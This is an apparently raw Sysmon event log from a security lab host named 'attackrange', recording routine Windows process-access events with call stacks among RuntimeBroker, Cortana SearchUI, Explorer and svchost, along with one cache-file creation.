13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.336{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.320{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+b8fc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.273{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+c370|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.273{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.055{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.023{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.023{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000012486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.976{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132554519155737523.txt2021-01-18 13:58:35.976 10341000x800000000000000012485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.976{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000012484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.976{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.929{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.929{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845220C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845220C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.929{59A5CD1D-8E46-6005-1100-00000000A301}11721276C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000012478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000012477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Wind
ows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
